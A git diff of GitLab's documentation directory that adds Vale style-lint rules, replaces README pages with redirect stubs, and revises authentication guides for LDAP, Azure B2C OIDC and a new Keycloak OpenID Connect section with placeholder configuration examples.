diff options
Diffstat (limited to 'doc')
847 files changed, 54437 insertions, 20628 deletions
diff --git a/doc/.markdownlint/markdownlint-no-trailing-spaces.yml b/doc/.markdownlint/markdownlint-no-trailing-spaces.yml index 3d107a3e667..71903ae423d 100644 --- a/doc/.markdownlint/markdownlint-no-trailing-spaces.yml +++ b/doc/.markdownlint/markdownlint-no-trailing-spaces.yml @@ -1,3 +1,4 @@ +--- # Extended Markdown configuration to enforce no-trailing-spaces rule "extends": "../../.markdownlint.yml" "no-trailing-spaces": true diff --git a/doc/.vale/gitlab/Acronyms.yml b/doc/.vale/gitlab/Acronyms.yml index d7f5c750ec0..bc8f38fe5e2 100644 --- a/doc/.vale/gitlab/Acronyms.yml +++ b/doc/.vale/gitlab/Acronyms.yml @@ -102,6 +102,7 @@ exceptions: - NFS - NGINX - NOTE + - NPM - NTP - ONLY - OSS @@ -119,6 +120,7 @@ exceptions: - PUT - RAID - RAM + - RBAC - RDP - REST - RFC diff --git a/doc/.vale/gitlab/HeaderGerunds.yml b/doc/.vale/gitlab/HeaderGerunds.yml new file mode 100644 index 00000000000..9e5fa19f867 --- /dev/null +++ b/doc/.vale/gitlab/HeaderGerunds.yml @@ -0,0 +1,14 @@ +--- +# Suggestion: gitlab.HeaderGerunds +# +# Checks for headers that start with gerunds (ing words). +# Related to: https://docs.gitlab.com/ee/development/documentation/structure.html +# +# For a list of all options, see https://errata-ai.gitbook.io/vale/getting-started/styles +extends: substitution +message: 'Can this header start with an imperative verb, instead of a gerund (ing word)?' +link: https://docs.gitlab.com/ee/development/documentation/styleguide/#heading-titles +level: suggestion +scope: heading +swap: + - '^\w*ing.*': 'Troubleshooting' diff --git a/doc/.vale/gitlab/SubstitutionWarning.yml b/doc/.vale/gitlab/SubstitutionWarning.yml index b38427ace09..50ac97bc227 100644 --- a/doc/.vale/gitlab/SubstitutionWarning.yml +++ b/doc/.vale/gitlab/SubstitutionWarning.yml @@ -19,15 +19,6 @@ swap: info: information repo: repository utilize: use - owner access: the Owner role - owner permission: the Owner role - owner permissions: the Owner role - maintainer access: the Maintainer role - maintainer permission: the Maintainer role - maintainer permissions: the Maintainer role administrator access: the Administrator role administrator permission: the Administrator role administrator permissions: the Administrator role - developer access: the Developer role - developer permission: the Developer role - developer permissions: the Developer role diff --git a/doc/.vale/gitlab/Substitutions.yml b/doc/.vale/gitlab/Substitutions.yml index 99d2eb1f11a..e6c150fb8be 100644 --- a/doc/.vale/gitlab/Substitutions.yml +++ b/doc/.vale/gitlab/Substitutions.yml @@ -38,3 +38,12 @@ swap: can sign-in: can sign in x509: X.509 yaml: YAML + developer access: the Developer role + developer permission: the Developer role + developer permissions: the Developer role + maintainer access: the Maintainer role + maintainer permission: the Maintainer role + maintainer permissions: the Maintainer role + owner access: the Owner role + owner permission: the Owner role + owner permissions: the Owner role diff --git a/doc/.vale/gitlab/spelling-exceptions.txt b/doc/.vale/gitlab/spelling-exceptions.txt index d465767049f..0520fd53c16 100644 --- a/doc/.vale/gitlab/spelling-exceptions.txt +++ b/doc/.vale/gitlab/spelling-exceptions.txt @@ -247,6 +247,7 @@ Helm Heroku Herokuish Hexo +HipChat hostname hostnames hotfix @@ -289,12 +290,14 @@ kanbans kaniko Karma Kerberos +Keycloak keyset keyspace keytab keytabs Kibana Kinesis +Klar Knative Kramdown Kroki diff --git a/doc/README.md b/doc/README.md index a56f17e3bf0..5ab8653dc35 100644 --- a/doc/README.md +++ b/doc/README.md @@ -1,126 +1,8 @@ --- -stage: none -group: unassigned -info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://about.gitlab.com/handbook/engineering/ux/technical-writing/#assignments -comments: false -description: 'Learn how to use and administer GitLab, the most scalable Git-based fully integrated platform for software development.' +redirect_to: 'index.md' --- -<div class="d-none"> - <h3>Visit <a href="https://docs.gitlab.com/ee/">docs.gitlab.com</a> for the latest version - of this help information with enhanced navigation, discoverability, and readability.</h3> -</div> -<!-- the div above will not display on the docs site but will display on /help --> +This document was moved to [another location](index.md). -# GitLab Docs - -Welcome to [GitLab](https://about.gitlab.com/) documentation. - -Here you can access the complete documentation for GitLab, the single application for the -[entire DevOps lifecycle](#the-entire-devops-lifecycle). - -## Overview - -No matter how you use GitLab, we have documentation for you. - -| Essential documentation | Essential documentation | -|:------------------------|:------------------------| -| [**User documentation**](user/index.md)<br>Discover features and concepts for GitLab users. | [**Administrator documentation**](administration/index.md)<br/>Everything GitLab self-managed administrators need to know. | -| [**Contributing to GitLab**](#contributing-to-gitlab)<br/>At GitLab, everyone can contribute! | [**New to Git and GitLab?**](#new-to-git-and-gitlab)<br/>We have the resources to get you started. | -| [**Build an integration with GitLab**](#build-an-integration-with-gitlab)<br/>Consult our integration documentation. | [**Coming to GitLab from another platform?**](#coming-to-gitlab-from-another-platform)<br/>Consult our guides. | -| [**Install GitLab**](https://about.gitlab.com/install/)<br/>Installation options for different platforms. | [**Customers**](subscriptions/index.md)<br/>Information for new and existing customers. | -| [**Update GitLab**](update/index.md)<br/>Update your GitLab self-managed instance to the latest version. | [**Reference Architectures**](administration/reference_architectures/index.md)<br/>GitLab reference architectures. | -| [**GitLab releases**](https://about.gitlab.com/releases/)<br/>What's new in GitLab. | | - -## Popular topics - -Have a look at some of our most popular topics: - -| Popular topic | Description | -|:-------------------------------------------------------------------------------------------|:------------| -| [Two-factor authentication](user/profile/account/two_factor_authentication.md) | Improve the security of your GitLab account. | -| [GitLab groups](user/group/index.md) | Manage projects together. | -| [GitLab CI/CD pipeline configuration reference](ci/yaml/README.md) | Available configuration options for `.gitlab-ci.yml` files. | -| [Activate GitLab EE with a license](user/admin_area/license.md) | Activate GitLab Enterprise Edition functionality with a license. | -| [Back up and restore GitLab](raketasks/backup_restore.md) | Rake tasks for backing up and restoring GitLab self-managed instances. | -| [GitLab release and maintenance policy](policy/maintenance.md) | Policies for version naming and cadence, and also upgrade recommendations. | -| [Elasticsearch integration](integration/elasticsearch.md) | Integrate Elasticsearch with GitLab to enable advanced searching. | -| [Omnibus GitLab database settings](https://docs.gitlab.com/omnibus/settings/database.html) | Database settings for Omnibus GitLab self-managed instances. | -| [Omnibus GitLab NGINX settings](https://docs.gitlab.com/omnibus/settings/nginx.html) | NGINX settings for Omnibus GitLab self-managed instances. | -| [Omnibus GitLab SSL configuration](https://docs.gitlab.com/omnibus/settings/ssl.html) | SSL settings for Omnibus GitLab self-managed instances. | -| [GitLab.com settings](user/gitlab_com/index.md) | Settings used for GitLab.com. | - -## The entire DevOps lifecycle - -GitLab is the first single application for software development, security, -and operations that enables [Concurrent DevOps](https://about.gitlab.com/topics/concurrent-devops/). -GitLab makes the software lifecycle faster and radically improves the speed of business. - -GitLab provides solutions for [each of the stages of the DevOps lifecycle](https://about.gitlab.com/stages-devops-lifecycle/). - -## New to Git and GitLab? - -Working with new systems can be daunting. - -We have the following documentation to rapidly uplift your GitLab knowledge: - -| Topic | Description | -|:--------------------------------------------------------------------------------------------------|:------------| -| [GitLab basics guides](gitlab-basics/index.md) | Start working on the command line and with GitLab. | -| [GitLab workflow overview](https://about.gitlab.com/topics/version-control/what-is-gitlab-workflow/) | Enhance your workflow with the best of GitLab Workflow. | -| [Get started with GitLab CI/CD](ci/quick_start/index.md) | Quickly implement GitLab CI/CD. | -| [Auto DevOps](topics/autodevops/index.md) | Learn more about Auto DevOps in GitLab. | -| [GitLab Markdown](user/markdown.md) | Advanced formatting system (GitLab Flavored Markdown). | - -### User account - -Learn more about GitLab account management: - -| Topic | Description | -|:-----------------------------------------------------------|:------------| -| [User account](user/profile/index.md) | Manage your account. | -| [Authentication](topics/authentication/index.md) | Account security with two-factor authentication, set up your SSH keys, and deploy keys for secure access to your projects. | -| [User settings](user/profile/index.md#access-your-user-settings) | Manage your user settings, two factor authentication, and more. | -| [User permissions](user/permissions.md) | Learn what each role in a project can do. | - -### Git and GitLab - -Learn more about using Git, and using Git with GitLab: - -| Topic | Description | -|:-----------------------------------------------------------------------------|:------------| -| [Git](topics/git/index.md) | Getting started with Git, branching strategies, Git LFS, and advanced use. | -| [Git cheat sheet](https://about.gitlab.com/images/press/git-cheat-sheet.pdf) | Download a PDF describing the most used Git operations. | -| [GitLab Flow](topics/gitlab_flow.md) | Explore the best of Git with the GitLab Flow strategy. | - -## Coming to GitLab from another platform - -If you are coming to GitLab from another platform, the following information is useful: - -| Topic | Description | -|:----------------------------------------------------|:------------| -| [Importing to GitLab](user/project/import/index.md) | Import your projects from GitHub, Bitbucket, GitLab.com, FogBugz, and SVN into GitLab. | -| [Migrating from SVN](user/project/import/svn.md) | Convert a SVN repository to Git and GitLab. | - -## Build an integration with GitLab - -There are many ways to integrate with GitLab, including: - -| Topic | Description | -|:-------------------------------------------|:------------| -| [GitLab REST API](api/README.md) | Integrate with GitLab using our REST API. | -| [GitLab GraphQL API](api/graphql/index.md) | Integrate with GitLab using our GraphQL API. | -| [Integrations](integration/index.md) | Integrations with third-party products. | - -## Contributing to GitLab - -GitLab Community Edition is [open source](https://gitlab.com/gitlab-org/gitlab-foss/) -and GitLab Enterprise Edition is [open-core](https://gitlab.com/gitlab-org/gitlab/). - -Learn how to contribute to GitLab with the following resources: - -| Topic | Description | -|:------------------------------------------------------------|:------------| -| [Development](development/README.md) | How to contribute to GitLab development. | -| [Legal](legal/index.md) | Contributor license agreements. | -| [Writing documentation](development/documentation/index.md) | How to contribute to GitLab Docs. | +<!-- This redirect file can be deleted after 2021-09-28. --> +<!-- Before deletion, see: https://docs.gitlab.com/ee/development/documentation/#move-or-rename-a-page --> diff --git a/doc/administration/audit_events.md b/doc/administration/audit_events.md index f0c4d947668..7a871caf658 100644 --- a/doc/administration/audit_events.md +++ b/doc/administration/audit_events.md @@ -120,6 +120,9 @@ From there, you can see the following actions: - Project access token was successfully created or revoked ([Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/230007) in GitLab 13.9) - Failed attempt to create or revoke a project access token ([Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/230007) in GitLab 13.9) - When default branch changes for a project ([Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/52339) in GitLab 13.9) +- Created, updated, or deleted DAST profiles, DAST scanner profiles, and DAST site profiles + ([Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/217872) in GitLab 14.1) +- Changed a project's compliance framework ([Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/329362) in GitLab 14.1) Project events can also be accessed via the [Project Audit Events API](../api/audit_events.md#project-audit-events). @@ -161,6 +164,9 @@ The following user actions are recorded: - Failed second-factor authentication attempt ([introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/16826) in GitLab 13.5) - A user's personal access token was successfully created or revoked ([introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/276921) in GitLab 13.6) - A failed attempt to create or revoke a user's personal access token ([introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/276921) in GitLab 13.6) +- Administrator added or removed ([introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/323905) in GitLab 14.1) +- Removed SSH key ([introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/220127) in GitLab 14.1) +- Added or removed GPG key ([introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/220127) in GitLab 14.1) Instance events can also be accessed via the [Instance Audit Events API](../api/audit_events.md#instance-audit-events). @@ -188,7 +194,7 @@ on adding these events into GitLab: Don't see the event you want in any of the epics linked above? You can use the **Audit Event Proposal** issue template to [create an issue](https://gitlab.com/gitlab-org/gitlab/-/issues/new?issuable_template=Audit%20Event%20Proposal) -to request it. +to request it, or you can [add it yourself](../development/audit_event_guide/). ### Disabled events diff --git a/doc/administration/auth/README.md b/doc/administration/auth/README.md index a072cc73c43..5ab8653dc35 100644 --- a/doc/administration/auth/README.md +++ b/doc/administration/auth/README.md @@ -1,52 +1,8 @@ --- -comments: false -type: index -stage: Manage -group: Access -info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://about.gitlab.com/handbook/engineering/ux/technical-writing/#assignments +redirect_to: 'index.md' --- -# GitLab authentication and authorization **(FREE SELF)** +This document was moved to [another location](index.md). -GitLab integrates with the following external authentication and authorization -providers: - -- [Atlassian](atlassian.md) -- [Auth0](../../integration/auth0.md) -- [Authentiq](authentiq.md) -- [AWS Cognito](cognito.md) -- [Azure](../../integration/azure.md) -- [Bitbucket Cloud](../../integration/bitbucket.md) -- [CAS](../../integration/cas.md) -- [Crowd](crowd.md) -- [Facebook](../../integration/facebook.md) -- [GitHub](../../integration/github.md) -- [GitLab.com](../../integration/gitlab.md) -- [Google OAuth](../../integration/google.md) -- [JWT](jwt.md) -- [Kerberos](../../integration/kerberos.md) -- [LDAP](ldap/index.md): Includes Active Directory, Apple Open Directory, Open LDAP, - and 389 Server. - - [Google Secure LDAP](ldap/google_secure_ldap.md) -- [Salesforce](../../integration/salesforce.md) -- [SAML](../../integration/saml.md) -- [SAML for GitLab.com groups](../../user/group/saml_sso/index.md) **(PREMIUM SAAS)** -- [Shibboleth](../../integration/shibboleth.md) -- [Smartcard](smartcard.md) **(PREMIUM SELF)** -- [Twitter](../../integration/twitter.md) - -NOTE: -UltraAuth has removed their software which supports OmniAuth integration. We have therefore removed all references to UltraAuth integration. - -## SaaS vs Self-Managed Comparison - -The external authentication and authorization providers may support the following capabilities. -For more information, see the links shown on this page for each external provider. - -| Capability | SaaS | Self-Managed | -|-------------------------------------------------|-----------------------------------------|------------------------------------| -| **User Provisioning** | SCIM<br>JIT Provisioning | LDAP Sync | -| **User Detail Updating** (not group management) | Not Available | LDAP Sync | -| **Authentication** | SAML at top-level group (1 provider) | LDAP (multiple providers)<br>Generic OAuth2<br>SAML (only 1 permitted per unique provider)<br>Kerberos<br>JWT<br>Smartcard<br>OmniAuth Providers (only 1 permitted per unique provider) | -| **Provider-to-GitLab Role Sync** | SAML Group Sync | LDAP Group Sync | -| **User Removal** | SCIM (remove user from top-level group) | LDAP (Blocking User from Instance) | +<!-- This redirect file can be deleted after 2021-09-28. --> +<!-- Before deletion, see: https://docs.gitlab.com/ee/development/documentation/#move-or-rename-a-page --> diff --git a/doc/administration/auth/atlassian.md b/doc/administration/auth/atlassian.md index 365236748b9..b3892f8f5d9 100644 --- a/doc/administration/auth/atlassian.md +++ b/doc/administration/auth/atlassian.md @@ -11,7 +11,7 @@ To enable the Atlassian OmniAuth provider for passwordless authentication you mu ## Atlassian application registration -1. Go to <https://developer.atlassian.com/apps/> and sign-in with the Atlassian +1. Go to <https://developer.atlassian.com/console/myapps/> and sign-in with the Atlassian account that will administer the application. 1. Click **Create a new app**. diff --git a/doc/administration/auth/authentiq.md b/doc/administration/auth/authentiq.md index 2eab4555c85..835293ff500 100644 --- a/doc/administration/auth/authentiq.md +++ b/doc/administration/auth/authentiq.md @@ -9,7 +9,7 @@ info: To determine the technical writer assigned to the Stage/Group associated w To enable the Authentiq OmniAuth provider for passwordless authentication you must register an application with Authentiq. -Authentiq will generate a Client ID and the accompanying Client Secret for you to use. +Authentiq generates a Client ID and the accompanying Client Secret for you to use. 1. Get your Client credentials (Client ID and Client Secret) at [Authentiq](https://www.authentiq.com/developers). @@ -67,15 +67,17 @@ Authentiq will generate a Client ID and the accompanying Client Secret for you t 1. [Reconfigure](../restart_gitlab.md#omnibus-gitlab-reconfigure) or [restart GitLab](../restart_gitlab.md#installations-from-source) for the changes to take effect if you installed GitLab via Omnibus or from source respectively. -On the sign in page there should now be an Authentiq icon below the regular sign in form. Click the icon to begin the authentication process. +On the sign in page there should now be an Authentiq icon below the regular sign in form. Click the +icon to begin the authentication process. If the user: -- If the user has the Authentiq ID app installed in their iOS or Android device, they can: +- Has the Authentiq ID app installed in their iOS or Android device, they can: 1. Scan the QR code. 1. Decide what personal details to share. 1. Sign in to your GitLab installation. -- If not they will be prompted to download the app and then follow the procedure above. +- Does not have the app installed, they are prompted to download the app and then follow the + procedure above. -If everything goes right, the user will be returned to GitLab and will be signed in. +If everything works, the user is returned to GitLab and is signed in. <!-- ## Troubleshooting diff --git a/doc/administration/auth/index.md b/doc/administration/auth/index.md new file mode 100644 index 00000000000..a072cc73c43 --- /dev/null +++ b/doc/administration/auth/index.md @@ -0,0 +1,52 @@ +--- +comments: false +type: index +stage: Manage +group: Access +info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://about.gitlab.com/handbook/engineering/ux/technical-writing/#assignments +--- + +# GitLab authentication and authorization **(FREE SELF)** + +GitLab integrates with the following external authentication and authorization +providers: + +- [Atlassian](atlassian.md) +- [Auth0](../../integration/auth0.md) +- [Authentiq](authentiq.md) +- [AWS Cognito](cognito.md) +- [Azure](../../integration/azure.md) +- [Bitbucket Cloud](../../integration/bitbucket.md) +- [CAS](../../integration/cas.md) +- [Crowd](crowd.md) +- [Facebook](../../integration/facebook.md) +- [GitHub](../../integration/github.md) +- [GitLab.com](../../integration/gitlab.md) +- [Google OAuth](../../integration/google.md) +- [JWT](jwt.md) +- [Kerberos](../../integration/kerberos.md) +- [LDAP](ldap/index.md): Includes Active Directory, Apple Open Directory, Open LDAP, + and 389 Server. + - [Google Secure LDAP](ldap/google_secure_ldap.md) +- [Salesforce](../../integration/salesforce.md) +- [SAML](../../integration/saml.md) +- [SAML for GitLab.com groups](../../user/group/saml_sso/index.md) **(PREMIUM SAAS)** +- [Shibboleth](../../integration/shibboleth.md) +- [Smartcard](smartcard.md) **(PREMIUM SELF)** +- [Twitter](../../integration/twitter.md) + +NOTE: +UltraAuth has removed their software which supports OmniAuth integration. We have therefore removed all references to UltraAuth integration. + +## SaaS vs Self-Managed Comparison + +The external authentication and authorization providers may support the following capabilities. +For more information, see the links shown on this page for each external provider. + +| Capability | SaaS | Self-Managed | +|-------------------------------------------------|-----------------------------------------|------------------------------------| +| **User Provisioning** | SCIM<br>JIT Provisioning | LDAP Sync | +| **User Detail Updating** (not group management) | Not Available | LDAP Sync | +| **Authentication** | SAML at top-level group (1 provider) | LDAP (multiple providers)<br>Generic OAuth2<br>SAML (only 1 permitted per unique provider)<br>Kerberos<br>JWT<br>Smartcard<br>OmniAuth Providers (only 1 permitted per unique provider) | +| **Provider-to-GitLab Role Sync** | SAML Group Sync | LDAP Group Sync | +| **User Removal** | SCIM (remove user from top-level group) | LDAP (Blocking User from Instance) | diff --git a/doc/administration/auth/ldap/index.md b/doc/administration/auth/ldap/index.md index bc6a854c518..a9d59ca0983 100644 --- a/doc/administration/auth/ldap/index.md +++ b/doc/administration/auth/ldap/index.md @@ -174,6 +174,7 @@ production: | `base` | Base where we can search for users. | **{check-circle}** Yes | `'ou=people,dc=gitlab,dc=example'` or `'DC=mydomain,DC=com'` | | `user_filter` | Filter LDAP users. Format: [RFC 4515](https://tools.ietf.org/search/rfc4515) Note: GitLab does not support `omniauth-ldap`'s custom filter syntax. | **{dotted-circle}** No | For examples, read [Examples of user filters](#examples-of-user-filters). | | `lowercase_usernames` | If enabled, GitLab converts the name to lower case. | **{dotted-circle}** No | boolean | +| `retry_empty_result_with_codes` | An array of LDAP query response code that will attempt to retrying the operation if the result/content is empty. | **{dotted-circle}** No | `[80]` | #### Examples of user filters diff --git a/doc/administration/auth/ldap/ldap-troubleshooting.md b/doc/administration/auth/ldap/ldap-troubleshooting.md index 1215d90134f..5e6c3443e44 100644 --- a/doc/administration/auth/ldap/ldap-troubleshooting.md +++ b/doc/administration/auth/ldap/ldap-troubleshooting.md @@ -552,7 +552,7 @@ LDAP. If the email has changed and the DN has not, GitLab finds the user with the DN and update its own record of the user's email to match the one in LDAP. -However, if the primary email _and_ the DN change in LDAP, then GitLab +However, if the primary email _and_ the DN change in LDAP, then GitLab has no way of identifying the correct LDAP record of the user and, as a result, the user is blocked. To rectify this, the user's existing profile must be updated with at least one of the new values (primary diff --git a/doc/administration/auth/oidc.md b/doc/administration/auth/oidc.md index 30ca7d94a1e..951c7df26ef 100644 --- a/doc/administration/auth/oidc.md +++ b/doc/administration/auth/oidc.md @@ -159,14 +159,14 @@ gitlab_rails['omniauth_providers'] = [ ### Microsoft Azure The OpenID Connect (OIDC) protocol for Microsoft Azure uses the [Microsoft identity platform (v2) endpoints](https://docs.microsoft.com/en-us/azure/active-directory/azuread-dev/azure-ad-endpoint-comparison). -To get started, sign in to the [Azure Portal](https://portal.azure.com). For your app, you'll need the +To get started, sign in to the [Azure Portal](https://portal.azure.com). For your app, you need the following information: - A tenant ID. You may already have one. For more information, review the [Microsoft Azure Tenant](https://docs.microsoft.com/en-us/azure/active-directory/develop/quickstart-create-new-tenant) documentation. - A client ID and a client secret. Follow the instructions in the - [Microsoft Quickstart Register an Application](https://docs.microsoft.com/en-us/azure/active-directory/develop/quickstart-register-app) documentation. -to obtain the tenant ID, client ID, and client secret for your app. + [Microsoft Quickstart Register an Application](https://docs.microsoft.com/en-us/azure/active-directory/develop/quickstart-register-app) documentation + to obtain the tenant ID, client ID, and client secret for your app. Example Omnibus configuration block: @@ -199,7 +199,7 @@ Microsoft has documented how its platform works with [the OIDC protocol](https:/ While GitLab works with [Azure Active Directory B2C](https://docs.microsoft.com/en-us/azure/active-directory-b2c/overview), it requires special configuration to work. To get started, sign in to the [Azure Portal](https://portal.azure.com). -For your app, you'll need the following information from Azure: +For your app, you need the following information from Azure: - A tenant ID. You may already have one. For more information, review the [Microsoft Azure Tenant](https://docs.microsoft.com/en-us/azure/active-directory/develop/quickstart-create-new-tenant) documentation. @@ -216,8 +216,8 @@ In addition, ensure that [ID tokens are enabled](https://docs.microsoft.com/en-u Add the following API permissions to the app: -1. `openid` -1. `offline_access` +- `openid` +- `offline_access` #### Configure custom policies @@ -231,7 +231,7 @@ standard Azure B2C user flows [do not send the OpenID `email` claim](https://git other words, they do not work with the [`allow_single_sign_on` or `auto_link_user` parameters](../../integration/omniauth.md#initial-omniauth-configuration). With a standard Azure B2C policy, GitLab cannot create a new account or -link to an existing one with an e-mail address. +link to an existing one with an email address. Carefully follow the instructions for [creating a custom policy](https://docs.microsoft.com/en-us/azure/active-directory-b2c/tutorial-create-user-flows?pivots=b2c-custom-policy). @@ -240,42 +240,42 @@ but `LocalAccounts` works for authenticating against local, Active Directory acc 1. To export the `email` claim, modify the `SignUpOrSignin.xml`. Replace the following line: - ```xml - <OutputClaim ClaimTypeReferenceId="email" /> - ``` + ```xml + <OutputClaim ClaimTypeReferenceId="email" /> + ``` - with: + with: - ```xml - <OutputClaim ClaimTypeReferenceId="signInNames.emailAddress" PartnerClaimType="email" /> - ``` + ```xml + <OutputClaim ClaimTypeReferenceId="signInNames.emailAddress" PartnerClaimType="email" /> + ``` 1. For OIDC discovery to work with B2C, the policy must be configured with an issuer compatible with the [OIDC -specification](https://openid.net/specs/openid-connect-discovery-1_0.html#rfc.section.4.3). -See the [token compatibility settings](https://docs.microsoft.com/en-us/azure/active-directory-b2c/configure-tokens?pivots=b2c-custom-policy#token-compatibility-settings). -In `TrustFrameworkBase.xml` under `JwtIssuer`, set `IssuanceClaimPattern` to `AuthorityWithTfp`: - - ```xml - <ClaimsProvider> - <DisplayName>Token Issuer</DisplayName> - <TechnicalProfiles> - <TechnicalProfile Id="JwtIssuer"> - <DisplayName>JWT Issuer</DisplayName> - <Protocol Name="None" /> - <OutputTokenFormat>JWT</OutputTokenFormat> - <Metadata> - <Item Key="IssuanceClaimPattern">AuthorityWithTfp</Item> - ... - ``` + specification](https://openid.net/specs/openid-connect-discovery-1_0.html#rfc.section.4.3). + See the [token compatibility settings](https://docs.microsoft.com/en-us/azure/active-directory-b2c/configure-tokens?pivots=b2c-custom-policy#token-compatibility-settings). + In `TrustFrameworkBase.xml` under `JwtIssuer`, set `IssuanceClaimPattern` to `AuthorityWithTfp`: + + ```xml + <ClaimsProvider> + <DisplayName>Token Issuer</DisplayName> + <TechnicalProfiles> + <TechnicalProfile Id="JwtIssuer"> + <DisplayName>JWT Issuer</DisplayName> + <Protocol Name="None" /> + <OutputTokenFormat>JWT</OutputTokenFormat> + <Metadata> + <Item Key="IssuanceClaimPattern">AuthorityWithTfp</Item> + ... + ``` 1. Now [upload the policy](https://docs.microsoft.com/en-us/azure/active-directory-b2c/tutorial-create-user-flows?pivots=b2c-custom-policy#upload-the-policies). Overwrite -the existing files if you are updating an existing policy. + the existing files if you are updating an existing policy. -1. Determine the issuer URL using the sign-in policy. The issuer URL will be in the form: +1. Determine the issuer URL using the sign-in policy. The issuer URL is in the form: - ```markdown - https://<YOUR-DOMAIN>/tfp/<YOUR-TENANT-ID>/<YOUR-SIGN-IN-POLICY-NAME>/v2.0/ - ``` + ```markdown + https://<YOUR-DOMAIN>/tfp/<YOUR-TENANT-ID>/<YOUR-SIGN-IN-POLICY-NAME>/v2.0/ + ``` The policy name is lowercased in the URL. For example, `B2C_1A_signup_signin` policy appears as `b2c_1a_signup_sigin`. @@ -283,63 +283,183 @@ the existing files if you are updating an existing policy. Note that the trailing forward slash is required. 1. Verify the operation of the OIDC discovery URL and issuer URL, append `.well-known/openid-configuration` -to the issuer URL: + to the issuer URL: + + ```markdown + https://<YOUR-DOMAIN>/tfp/<YOUR-TENANT-ID>/<YOUR-SIGN-IN-POLICY-NAME>/v2.0/.well-known/openid-configuration + ``` + + For example, if `domain` is `example.b2clogin.com` and tenant ID is + `fc40c736-476c-4da1-b489-ee48cee84386`, you can use `curl` and `jq` to extract the issuer: + + ```shell + $ curl --silent "https://example.b2clogin.com/tfp/fc40c736-476c-4da1-b489-ee48cee84386/b2c_1a_signup_signin/v2.0/.well-known/openid-configuration" | jq .issuer + "https://example.b2clogin.com/tfp/fc40c736-476c-4da1-b489-ee48cee84386/b2c_1a_signup_signin/v2.0/" + ``` + +1. Configure the issuer URL with the custom policy used for `signup_signin`. For example, this is + the Omnibus configuration with a custom policy for `b2c_1a_signup_signin`: + + ```ruby + gitlab_rails['omniauth_providers'] = [ + { + 'name' => 'openid_connect', + 'label' => 'Azure B2C OIDC', + 'args' => { + 'name' => 'openid_connect', + 'scope' => ['openid'], + 'response_mode' => 'query', + 'response_type' => 'id_token', + 'issuer' => 'https://<YOUR-DOMAIN>/tfp/<YOUR-TENANT-ID>/b2c_1a_signup_signin/v2.0/', + 'client_auth_method' => 'query', + 'discovery' => true, + 'send_scope_to_token_endpoint' => true, + 'client_options' => { + 'identifier' => '<YOUR APP CLIENT ID>', + 'secret' => '<YOUR APP CLIENT SECRET>', + 'redirect_uri' => 'https://gitlab.example.com/users/auth/openid_connect/callback' + } + } + }] + ``` + +#### Troubleshooting Azure B2C - ```markdown - https://<YOUR-DOMAIN>/tfp/<YOUR-TENANT-ID>/<YOUR-SIGN-IN-POLICY-NAME>/v2.0/.well-known/openid-configuration - ``` +- Ensure all occurrences of `yourtenant.onmicrosoft.com`, `ProxyIdentityExperienceFrameworkAppId`, and `IdentityExperienceFrameworkAppId` match your B2C tenant hostname and + the respective client IDs in the XML policy files. +- Add `https://jwt.ms` as a redirect URI to the app, and use the [custom policy tester](https://docs.microsoft.com/en-us/azure/active-directory-b2c/tutorial-create-user-flows?pivots=b2c-custom-policy#test-the-custom-policy). + Make sure the payload includes `email` that matches the user's email access. +- After you enable the custom policy, users might see "Invalid username or password" after they try to sign in. This might be a configuration + issue with the `IdentityExperienceFramework` app. See [this Microsoft comment](https://docs.microsoft.com/en-us/answers/questions/50355/unable-to-sign-on-using-custom-policy.html?childToView=122370#comment-122370) + that suggests checking that the app manifest contains these settings: + + - `"accessTokenAcceptedVersion": null` + - `"signInAudience": "AzureADMyOrg"` + + Note that this configuration corresponds with the `Supported account types` setting used when + creating the `IdentityExperienceFramework` app. + +#### Keycloak - For example, if `domain` is `example.b2clogin.com` and tenant ID is `fc40c736-476c-4da1-b489-ee48cee84386`, you can use `curl` and `jq` to -extract the issuer: +GitLab works with OpenID providers that use HTTPS. Although a Keycloak +server can be set up using HTTP, GitLab can only communicate +with a Keycloak server that uses HTTPS. - ```shell - $ curl --silent "https://example.b2clogin.com/tfp/fc40c736-476c-4da1-b489-ee48cee84386/b2c_1a_signup_signin/v2.0/.well-known/openid-configuration" | jq .issuer - "https://example.b2clogin.com/tfp/fc40c736-476c-4da1-b489-ee48cee84386/b2c_1a_signup_signin/v2.0/" - ``` +We highly recommend configuring Keycloak to use public key encryption algorithms (for example, +RSA256, RSA512, and so on) instead of symmetric key encryption algorithms (for example, HS256 or HS358) to +sign tokens. Public key encryption algorithms are: -1. Configure the issuer URL with the custom policy used for -`signup_signin`. For example, this is the Omnibus configuration with a -custom policy for `b2c_1a_signup_signin`: +- Easier to configure. +- More secure because leaking the private key has severe security consequences. + +The signature algorithm can be configured in the Keycloak administration console under +**Realm Settings > Tokens > Default Signature Algorithm**. + +Example Omnibus configuration block: ```ruby gitlab_rails['omniauth_providers'] = [ -{ - 'name' => 'openid_connect', - 'label' => 'Azure B2C OIDC', - 'args' => { + { 'name' => 'openid_connect', - 'scope' => ['openid'], - 'response_mode' => 'query', - 'response_type' => 'id_token', - 'issuer' => 'https://<YOUR-DOMAIN>/tfp/<YOUR-TENANT-ID>/b2c_1a_signup_signin/v2.0/', - 'client_auth_method' => 'query', - 'discovery' => true, - 'send_scope_to_token_endpoint' => true, - 'client_options' => { - 'identifier' => '<YOUR APP CLIENT ID>', - 'secret' => '<YOUR APP CLIENT SECRET>', - 'redirect_uri' => 'https://gitlab.example.com/users/auth/openid_connect/callback' + 'label' => 'Keycloak', + 'args' => { + 'name' => 'openid_connect', + 'scope' => ['openid', 'profile', 'email'], + 'response_type' => 'code', + 'issuer' => 'https://keycloak.example.com/auth/realms/myrealm', + 'client_auth_method' => 'query', + 'discovery' => true, + 'uid_field' => 'preferred_username', + 'client_options' => { + 'identifier' => '<YOUR CLIENT ID>', + 'secret' => '<YOUR CLIENT SECRET>', + 'redirect_uri' => 'https://gitlab.example.com/users/auth/openid_connect/callback' + } } } -}] +] ``` -#### 